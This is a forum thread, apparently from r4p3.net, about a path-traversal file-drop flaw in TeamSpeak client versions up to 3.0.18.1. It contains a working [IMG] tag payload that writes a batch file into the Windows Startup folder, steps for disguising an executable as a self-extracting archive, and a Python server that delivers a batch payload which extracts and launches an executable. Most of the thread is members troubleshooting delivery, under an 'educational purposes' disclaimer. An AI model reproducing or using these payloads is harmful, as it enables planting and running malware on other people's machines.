RFI vulnerability in TeamSpeak [3.0.0 - 3.0.18.1]

[Supervisor]

This is not meant to be used as a tutorial, but for educational purposes, only!

We, r4p3.net, are not responsible for any abuse of this! Use it only on your own computer with a virtual machine!

A few ways to protect yourself against this attack can be found here
Credits go to @Derp @Asphyxia @Kaptan647 @Supervisor


/edit @ version 3.0.18.1
Works with 3.0.18.1 if you simply change your link to the following:
[IMG]ftp://8.8.8.8/..\/..\/..\/..\/..\/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PoC.bat%20.jpg[/IMG]

For everyone with corrupted file after opening .bat
Just add .exe to winrar -> make it .sfx. Go to SFX options -> Make it run after unpack (type filename.exe). Check HIDE ALL and just pack it. Then change from file.sfx.exe to file.exe -> then edit in notepad++ add the first line, make sure its ending with good symbols (like on screen from first post paste).

/edit2: We will not provide any support for you to make it work since it is for educational purposes only!

 

[ehthe]

Wow I didn't think the teamspeak dev wouldn't have thought of that.
Did you test it with http ?

 

[Supervisor]

http and https does not work.

 

[Asphyxia]

Yes, we are not sure if it is possible. We tried all sorts of things to try getting it to work and concluded it to be impossible. It may be the way the web servers operate (we tried a couple). The goal was to get the "../" to work without throwing up any issues. It just was not working how we wanted, it seems to work fine with FTP though. We believe that the TS3 client seeks out a genuine 200, which apparently browsers are capable of reading an artificial/modified status code while the TeamSpeak client seems to only read the original, if that is possible? No fucking clue.

 

[ehthe]

So what I tried this afternoon (I had thought about that but not with ftp) might work with a custom crafted web server.
I think we could do something with https://wiki.python.org/moin/BaseHttpServer

 

[Asphyxia]

It may be possible, one amazing thing I would think of to be helpful is perhaps make ".." go a directory in like to "a" rather than backwards, then just make "a" ---> "a" ---> "a", etc. Not sure if that would work or not (back-end only).
Otherwise just throw a clean 200 result for ANYTHING including the batch file. With the "yo" shit at the top.

 

[ehthe]

Here's an a simple http server in python that will send the payload

Spoiler: Code

#!/usr/bin/python
# -*- coding: Latin-1 -*-

import time
import BaseHTTPServer


HOST_NAME = '0.0.0.0'
PORT_NUMBER = 8080

payload = "ÿØ 2>NUL & @echo off & cls stronkhackorskillz1337 & findstr /v \"cls stronkhackorskillz1337\" \"%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\PoC.poc\" > \"%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\PoC.exe\" & cd \"%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\" & start PoC.exe & del poc.bat & exit";

class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(s):
        s.send_response(200)
        s.end_headers()
        s.wfile.write(payload)

if __name__ == '__main__':
    server_class = BaseHTTPServer.HTTPServer
    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
    print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)

Tested with the default channel description; works. Onto more testing
Works with : banner gfx, icon url, channel description

 

[Asphyxia]

Would this handle sending the binary of an executable? The most important part is attaching an executable at the end of the payload (new line) to strip the line out (I think) and make an exe with the binary remaining.

 

[ehthe]

With python you can do whatever you want the main problem is encoding and variable type x)

 

[9dc]

i can download a file in the main folder but im not able to download it to startup

 

[ehthe]

Check the paths (your startup path and the dl-file path).
If you have set teamspeak to save its settings in the install dir that might be why it doesn't work.

 

[the|Ripper]

What is with the Pastebin Link? It seems to be private I am new to this.

 

[Supervisor]

try again, I did have to change it.. Did have to ban one user already because he was leaking it.

 

[the|Ripper]

Okay, thx. Leaking is not cool. Will look into that. So far only banner gfx, icon url, channel description are vuln? Or everywhere, where I can use my own imgs?

 

[Kaptan647]

banner icon and anywhere you can use

[img]

tag

 

[Probber]

It is not working correctly by me. Over Ts3 the File got created but is empty but if i download through the browser the File gots downloaded correctly. What i am doing wrong ?

 

[Supervisor]

Either your anonymous ftp user is not set up correctly, or you don't have the exact same directories in your ftp server as you want the file top be downloaded to.

 

[Probber]

Hm look at this picture you see i can download without Problems with a anon acc: https://gyazo.com/6c2766216ebb7065be2342067926b813 But at Teamspeak it didnt download.

 

[xYxD]

=== Client Release 3.0.18.1 10 Oct 2015
! Hotfix release to fix security vulnerability

 

[Supervisor]

the according post:
http://forum.teamspeak.com/showthre...ent-3-0-18-1-is-Available?p=420927#post420927